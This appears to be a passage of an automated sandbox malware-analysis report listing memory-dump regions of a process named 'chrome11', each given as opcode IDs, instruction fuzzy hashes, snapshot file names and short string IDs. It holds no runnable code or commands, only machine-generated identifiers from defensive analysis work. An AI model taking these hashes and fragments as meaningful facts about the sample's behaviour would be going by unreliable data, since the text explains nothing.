                                                • Instruction Fuzzy Hash: 2E228930908A5D8FDB95EF68C8957EDBBB1FF5A340F1440EAD009D7292DB38A985CB41
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6H
                                                • API String ID: 0-4091206214
                                                • Opcode ID: 863ac1de638558ee0a6c87124bc9ea0f0d1bf6d8261bd743cba445db280f50fa
                                                • Instruction ID: 2ea97d086f7b09e01ff0534a20edc3e1c6b80845521ecc77764342ae5eee2035
                                                • Opcode Fuzzy Hash: 863ac1de638558ee0a6c87124bc9ea0f0d1bf6d8261bd743cba445db280f50fa
                                                • Instruction Fuzzy Hash: A3E2E870A09A59CFEB99EB18C894BA8B7F1FF59340F5441E9D04DE72A6CA349D85CF00
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 12_H$p[J
                                                • API String ID: 0-1182768348
                                                • Opcode ID: 4c7c358a5a2eda55a0d63318034ef12a76b0fb9b67b5533bede80c229c55f79a
                                                • Instruction ID: 16170a4a73f9a910b5aa0308d4d886d4e34f91824053b8d9b0f1dec9602d0903
                                                • Opcode Fuzzy Hash: 4c7c358a5a2eda55a0d63318034ef12a76b0fb9b67b5533bede80c229c55f79a
                                                • Instruction Fuzzy Hash: 5BA18870D4865E8FEBA4DB68C8947EDB7B1FF65780F4441BAD00DE7292CA386985CB40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: p[J$p[J
                                                • API String ID: 0-801153983
                                                • Opcode ID: 6fcc26f09a3020d486fba98df45c53f294d3d7469d272065afdab8a963b90589
                                                • Instruction ID: 61ecf3005586a3fb2749803965e0df32ac1d41329b34689f117660d313d66fb4
                                                • Opcode Fuzzy Hash: 6fcc26f09a3020d486fba98df45c53f294d3d7469d272065afdab8a963b90589
                                                • Instruction Fuzzy Hash: 04915671D08A5D8FEB94EF68D8557ADBBB1FF59740F5000AAD00DE7292DB38A881CB41
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: XK$/H
                                                • API String ID: 0-1786878472
                                                • Opcode ID: 32e2efd4a6963b54afe11c28c77faa41bf18abdd4dab019f9df7f457db916c47
                                                • Instruction ID: b21ca6e5682be99fff0e7a34e1b4a9cff8e550443a7f39b8997ac446f2cd12a8
                                                • Opcode Fuzzy Hash: 32e2efd4a6963b54afe11c28c77faa41bf18abdd4dab019f9df7f457db916c47
                                                • Instruction Fuzzy Hash: 38A12970E08A5D8FDB98DF68C494BADB7B2FF5A340F1041AAD00DE7695CB386985CB40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: p[J
                                                • API String ID: 0-1975058490
                                                • Opcode ID: ee1430493785148b7e8b20b0f3184e456ca6948d7277b57b307f0728a6f026a0
                                                • Instruction ID: 450f04913ce69cc740c85c0dd8e724732abd1a43f02b24cbcd29a3c11c28e593
                                                • Opcode Fuzzy Hash: ee1430493785148b7e8b20b0f3184e456ca6948d7277b57b307f0728a6f026a0
                                                • Instruction Fuzzy Hash: BF12BF31D48A5E8FDB94DF68D8446EDBBB0FF65340F1401BAD409D7282DB39A955CB80
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6H
                                                • API String ID: 0-4091206214
                                                • Opcode ID: 7c2c6665a1178c0498e6313c68e306f3e87749685bf9c14b873fa46077a2dbb9
                                                • Instruction ID: 5d72e421da3fe9ab7815c5d95c817caa69a529c2bad50e96aacbf0479c9cc6c2
                                                • Opcode Fuzzy Hash: 7c2c6665a1178c0498e6313c68e306f3e87749685bf9c14b873fa46077a2dbb9
                                                • Instruction Fuzzy Hash: DA12717094CA8D8FDB89DF18C895AAD7BF1FF59340F0401AAE419C7296CB39E855CB81
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1480741877.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887c00000_chrome11.jbxd
                                                Similarity
                                                • API ID: InternetOption
                                                • String ID:
                                                • API String ID: 3327645240-0
                                                • Opcode ID: bc7e75f3640df9aeb5d220d6e5275615ab09d6da3813832522a5eedbead03e99
                                                • Instruction ID: 01456fe265fce3b908b4d07cbc312e1c8c1a14a68ebad0bde69c3045935433fd
                                                • Opcode Fuzzy Hash: bc7e75f3640df9aeb5d220d6e5275615ab09d6da3813832522a5eedbead03e99
                                                • Instruction Fuzzy Hash: 6731083190CB489FDB189BA8DC456F97BF0FF5A321F04427EE049D3192CA79A846C791
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6H
                                                • API String ID: 0-4091206214
                                                • Opcode ID: 29c7373888e2e32312c5f587e1e2341be78c3d8291982124144a112e574481bf
                                                • Instruction ID: b732e962148e40e1303237a499079d2c75bee5b66a5e4069712722d68bb9f529
                                                • Opcode Fuzzy Hash: 29c7373888e2e32312c5f587e1e2341be78c3d8291982124144a112e574481bf
                                                • Instruction Fuzzy Hash: A6B1AE71958A8E8FDB45DF68C8556ED7BF1FF58350F04027AE40AD3285DB38A846CB81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6H
                                                • API String ID: 0-4091206214
                                                • Opcode ID: dfda80ca5b36da4d356c8ba7db409714c29ad8197d64684c2f5f048bcd5921e9
                                                • Instruction ID: 82f31e43adba8f138dc3631302669fc39b9c0070693eb18d22d2f5f636e8576a
                                                • Opcode Fuzzy Hash: dfda80ca5b36da4d356c8ba7db409714c29ad8197d64684c2f5f048bcd5921e9
                                                • Instruction Fuzzy Hash: D5915D70A58A4D8FDB88EF18C895AED77B1FF58344F14067DE44AD3286CE38A941CB81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: p[J
                                                • API String ID: 0-1975058490
                                                • Opcode ID: 2a4e24cec72b4542166bc1517dcf34011a6b829109e121a2c4b02ff2afa6bc48
                                                • Instruction ID: a2c321d582387f7e466075d82645d01e044f55edde537d303b59cb90a045a0da
                                                • Opcode Fuzzy Hash: 2a4e24cec72b4542166bc1517dcf34011a6b829109e121a2c4b02ff2afa6bc48
                                                • Instruction Fuzzy Hash: 1F714670D48699CFEB54DFA8C8556EDBBF1FF09740F50007AE409EB282DA38A985CB51
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6H
                                                • API String ID: 0-4091206214
                                                • Opcode ID: 8c1df400410d542de9cddedff0adc6e0bd3029c89eb7c7a574caa23d5686db71
                                                • Instruction ID: d4ec1f34b2f6e34bf2977e84bd7902dd0783775696b191494bff14b20d5e6c81
                                                • Opcode Fuzzy Hash: 8c1df400410d542de9cddedff0adc6e0bd3029c89eb7c7a574caa23d5686db71
                                                • Instruction Fuzzy Hash: D451E270A1864D8FCF88DF58D881AAEBBF1FF58304F1486A9E409E7245C734E991CB81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0WR
                                                • API String ID: 0-717002791
                                                • Opcode ID: 3b2423fd7f6b5e5d28cbaa5cb18c6fed54d5ecb1e55c34ada40c2540c31f7911
                                                • Instruction ID: a718804e4a55b82ad813a1c85f77565373338be0af407efed11017282c046358
                                                • Opcode Fuzzy Hash: 3b2423fd7f6b5e5d28cbaa5cb18c6fed54d5ecb1e55c34ada40c2540c31f7911
                                                • Instruction Fuzzy Hash: 17315070928A4D8FDB48EF5CC8959ECB7F1FF58744F840169E45AD7295CB34A852CB40
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9d071f093879cfeae3cf05fb4a9fa2c525da0988449e1bc88c4a318995a28359
                                                • Instruction ID: cb2b86c15bf30e8a57b19e8310809dfddbefc6d8e6edb50f79df0bac69998aa6
                                                • Opcode Fuzzy Hash: 9d071f093879cfeae3cf05fb4a9fa2c525da0988449e1bc88c4a318995a28359
                                                • Instruction Fuzzy Hash: 41A2A27095464E8FDF05DF58C891AEDBBB2FF88304F148669D41AD724ACB38B852CB91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0e3cced1b69bcef3fbaf21f0acb9a9b89efb0868f3cc7bb894e511565382e3cd
                                                • Instruction ID: a3e372eb5aeeae81a868c99ab9999f45e832024e66420e94729d538d61dc80ce
                                                • Opcode Fuzzy Hash: 0e3cced1b69bcef3fbaf21f0acb9a9b89efb0868f3cc7bb894e511565382e3cd
                                                • Instruction Fuzzy Hash: 3E526A3084968D8FEB59EF68C8957EDBBB1FF1A340F1400BAD449D7292CB399985CB41
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8eec0745f2238a89cb995971a5359e738b8c2d008e089e470b02592fc2890bd7
                                                • Instruction ID: 32f5ac6fd5d37da207ee1658f629d571868bbd592c433205786f0b00ae39afe0
                                                • Opcode Fuzzy Hash: 8eec0745f2238a89cb995971a5359e738b8c2d008e089e470b02592fc2890bd7
                                                • Instruction Fuzzy Hash: 5A22B071D48A4E9FDB84EF68C8556EDBBF1FF59340F0401BAD409D3296DA38A846C781
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fa433f7476f09fda25196cb2869af9a7c253697d464c795194267b2f93529526
                                                • Instruction ID: 63f320fcf52f6cee05f91c028529ee3a25c4f249c29c131b57c7835a233bc56b
                                                • Opcode Fuzzy Hash: fa433f7476f09fda25196cb2869af9a7c253697d464c795194267b2f93529526
                                                • Instruction Fuzzy Hash: 1312A071D48A4E9FDB84EF68C8556EDBBF1FF59340F0401BAD409D3296DA38A846C781
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e5b970802a9cbcf776eaccf589175a525b6c2cb1a0eb06e51cf574d9e94d139e
                                                • Instruction ID: e6d919e82ff9666301269d958048513969115d26d9fa8548e51f73df7f275a5c
                                                • Opcode Fuzzy Hash: e5b970802a9cbcf776eaccf589175a525b6c2cb1a0eb06e51cf574d9e94d139e
                                                • Instruction Fuzzy Hash: C681D331E4CF4A9FEB99DA7C94699B93BF1FF59B50704017AD409C3296DE28AC02C781
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 637e9b3029b7f6fcb0ddd57a9b568db28ec4f962007601362413d21e801c21fe
                                                • Instruction ID: 71eaaaf70d86d3aa9d687201695f41b8fbcefbaac858e05d122c37c97403a4b1
                                                • Opcode Fuzzy Hash: 637e9b3029b7f6fcb0ddd57a9b568db28ec4f962007601362413d21e801c21fe
                                                • Instruction Fuzzy Hash: CDD1CE3084868E8FDB95DF68C8556ED7BB1FF69340F0801BAD409D7292DB39A945CB81
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b92a8a7dbbc203f81d33559181e24ed6e3bbf9c8fe50cc924aa5450b2bef4352
                                                • Instruction ID: 8c29029c03c51c2b2319f1d6c2e7fabf4fa96307fc42f1507417ecaf49254445
                                                • Opcode Fuzzy Hash: b92a8a7dbbc203f81d33559181e24ed6e3bbf9c8fe50cc924aa5450b2bef4352
                                                • Instruction Fuzzy Hash: B3B1CF3084968A8FDB56DF24C8557ED7BB1FF5A340F1401BAE409D7292CB3DA985CB81
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 51285cbcca21f806780997e476ba5e26a588d86129c991474f827161b9d67580
                                                • Instruction ID: b2fe272ffbffe8cb9b94bdc024ddff7345310b5c502d4f1107b6759db4385ad4
                                                • Opcode Fuzzy Hash: 51285cbcca21f806780997e476ba5e26a588d86129c991474f827161b9d67580
                                                • Instruction Fuzzy Hash: 2191CB3188D68E8FDB56EF6488552ED7BB0FF06350F0401BBE458C3192DB799A59CB82
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1a140d766f5ee433f9dc71046a8a8811541f1d3deef42c30873df735d9574c15
                                                • Instruction ID: d44a7b27c826294f6cc78f9cff8c03ec98378960c4af415a9d40f3c780f0ee85
                                                • Opcode Fuzzy Hash: 1a140d766f5ee433f9dc71046a8a8811541f1d3deef42c30873df735d9574c15
                                                • Instruction Fuzzy Hash: D871DD3198C68D8FDB85EF68D8556EDBBB0FF4A310F0401BEE00DE3192CA299955CB91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8547e78a07de27eb45d2eae23de80db12c09323d6d28378d3afbca432cb44320
                                                • Instruction ID: dfd8fb136b2ab0108481afd7267d5afc18e06f52d84022d8d9b389089dc749cb
                                                • Opcode Fuzzy Hash: 8547e78a07de27eb45d2eae23de80db12c09323d6d28378d3afbca432cb44320
                                                • Instruction Fuzzy Hash: 47816A70D5895ADFEBA8DA1898557BD77F1FF54380F5441AAC00EA7296CE3879C2CB00
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 82acf53ff822a02fbc71c950bba52b390f614b4662501816c6be1860c96d5ce6
                                                • Instruction ID: c44c885bb217bb2d718a58ad57c8dcd4f25a6ba195d5fb983165f4c1a615b940
                                                • Opcode Fuzzy Hash: 82acf53ff822a02fbc71c950bba52b390f614b4662501816c6be1860c96d5ce6
                                                • Instruction Fuzzy Hash: 25814C70A1864E9FCF88DF18C8919EE77B1FF58340F14466AE81AD7286CB34E851CB81
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1190694352a4c70d4fbf0c8931a1b03290a3fa6198f08d8ee0fbf964c45b1bc9
                                                • Instruction ID: 533a70bffd2e08b74fa46b60fe5e732019c63e462895abe2a6b99a6ce93dd56f
                                                • Opcode Fuzzy Hash: 1190694352a4c70d4fbf0c8931a1b03290a3fa6198f08d8ee0fbf964c45b1bc9
                                                • Instruction Fuzzy Hash: 7561993188D78D8FDB56EF2488552ED7BB0FF06340F0505BBE54883192DB79AA58CB82
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b07757ef60c937f1de1fa344847bad004c33430a21a291c84431fc80cb53e36f
                                                • Instruction ID: b990b91afc7af3568a4cd560e0a0abb75cc23e07316b2ee8170d62e0c756a398
                                                • Opcode Fuzzy Hash: b07757ef60c937f1de1fa344847bad004c33430a21a291c84431fc80cb53e36f
                                                • Instruction Fuzzy Hash: 1A618930948A5D8FDB95EF68D8156EDBBF0FF59310F0401BAE408E7291CB39A948CB91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 17d592dab148c4dd8ffc036dd35b68db96cb3c96ba8fd5dbc34ab257e0bcb26b
                                                • Instruction ID: aee37fdc5fb5cd370baeb2badc9e9479a87141afbd04ebd3d5509883cf4e1030
                                                • Opcode Fuzzy Hash: 17d592dab148c4dd8ffc036dd35b68db96cb3c96ba8fd5dbc34ab257e0bcb26b
                                                • Instruction Fuzzy Hash: 5451F23084DA8E8FEB42EB6888056FE7BB0FF4A354F1401BAD40CD7192CA3C5989C791
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9d6cbbe13617b6e7e1f5be1698b624bac9960a10dbf7e1e8696f9f48edc19ff1
                                                • Instruction ID: 29ec79af9f06433b52e0b4045a4ef1c025e1370600af9e98d2bf2d445cf585de
                                                • Opcode Fuzzy Hash: 9d6cbbe13617b6e7e1f5be1698b624bac9960a10dbf7e1e8696f9f48edc19ff1
                                                • Instruction Fuzzy Hash: 2C512571D4861A8FDBA8DE64C8907FDB7B1FF65781F540179D009AB282CB39A886CB40
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f4f7e2157060c7747c1b1bd177fbdd0631754a5507af76e9f0b17f477f045d77
                                                • Instruction ID: d53c86e9408146b658d68876948b36c370f52f055eb70ba5a5a98deb84dccf3f
                                                • Opcode Fuzzy Hash: f4f7e2157060c7747c1b1bd177fbdd0631754a5507af76e9f0b17f477f045d77
                                                • Instruction Fuzzy Hash: 6A5129A2E4DA866FE395893C595D13D7FF1FF57A8070802BAC0448799FC929AD05C391
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 51128a98d23b833b27103189174b4fcaedeb83e5ea0bed4346e06b3a303b66e2
                                                • Instruction ID: c6d5fd84381c86ade2b35a0ca3f3e587f7266b1eed60a7ed8c36e47438fb5a0e
                                                • Opcode Fuzzy Hash: 51128a98d23b833b27103189174b4fcaedeb83e5ea0bed4346e06b3a303b66e2
                                                • Instruction Fuzzy Hash: 95419C3188D2C94FD7539B248C625E93FB0FF16250F0A01EBE458CB093D66DAA5AC762
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b3f5d2eaad336a6f79b393c7502844359242f1c40bdce5dddd3a1138fca49253
                                                • Instruction ID: bd15d016783fe1651a72afbbcd95a0dd5ba547011291d9bf47c30a30ff5e7444
                                                • Opcode Fuzzy Hash: b3f5d2eaad336a6f79b393c7502844359242f1c40bdce5dddd3a1138fca49253
                                                • Instruction Fuzzy Hash: 15416070A0894C8FDF48EF68D454AADBBF1FF9A301F55557AD00AEB292CB359845CB00
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8f7b7ea072dcbe0919025d4363ea9cd312c4064c47d37f586a6d6bd77b32c548
                                                • Instruction ID: 57349b6f114b579638c2f19c49f06c2e11afab73dbe779af9925c5ee4b2e7a06
                                                • Opcode Fuzzy Hash: 8f7b7ea072dcbe0919025d4363ea9cd312c4064c47d37f586a6d6bd77b32c548
                                                • Instruction Fuzzy Hash: 85414A3194564E8FCB90EF28C8046EAB7F5FF863A4F00027AD41DDB1A0DB3A5A56CB41
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b9c826874a800019695bf461b8139913833fec3a80589d11eaca41c5610eff63
                                                • Instruction ID: 37454680ba8de9d577440c91d2c34cc6267939a3eb2ce7dc3c5a144e32a4db64
                                                • Opcode Fuzzy Hash: b9c826874a800019695bf461b8139913833fec3a80589d11eaca41c5610eff63
                                                • Instruction Fuzzy Hash: 7441793184D68D8FDB56EF6488552ED7BB0FF1A350F0401BBE548D3192DB789A58CB82
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b49b7526e761180b7038ea69b70803f38e3ceed2289b9c1c7442df7206d7a792
                                                • Instruction ID: 771bbbe3710479b943dac96ae78af1f360cfe7131de9f035127f82104a78a68f
                                                • Opcode Fuzzy Hash: b49b7526e761180b7038ea69b70803f38e3ceed2289b9c1c7442df7206d7a792
                                                • Instruction Fuzzy Hash: 5231E52198E7CA5FE34793345865AE93FB1BF83250F5941FAD489CB0A3D91C580AC312
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 72ed34eb55e4f1c60d07b85301ab71cdd0e67e649e6a78d7d90a44d31d2b4d74
                                                • Instruction ID: 5e2a2c7ecfc8896e8dfd82a30054d742455e3dddf372e83568f73bab2d989954
                                                • Opcode Fuzzy Hash: 72ed34eb55e4f1c60d07b85301ab71cdd0e67e649e6a78d7d90a44d31d2b4d74
                                                • Instruction Fuzzy Hash: 34318D3094DA8E8FEB81DB68C8047EE7BB1FF59350F1441BAD408D7292DA385988CB91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a85cbb6c73b12141b494cda6ee9766aee3978502b7eae9804548b1ba93464e81
                                                • Instruction ID: 8ccd5849c7c000ed8db7f0e63eac52ffe243ee73c1030f0c428c6caa98afc3a0
                                                • Opcode Fuzzy Hash: a85cbb6c73b12141b494cda6ee9766aee3978502b7eae9804548b1ba93464e81
                                                • Instruction Fuzzy Hash: D931AB53C4E5D22AE702A7B864951FD6FF0BF127A4B2C41B6D0D88F097DD0C6586C386
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
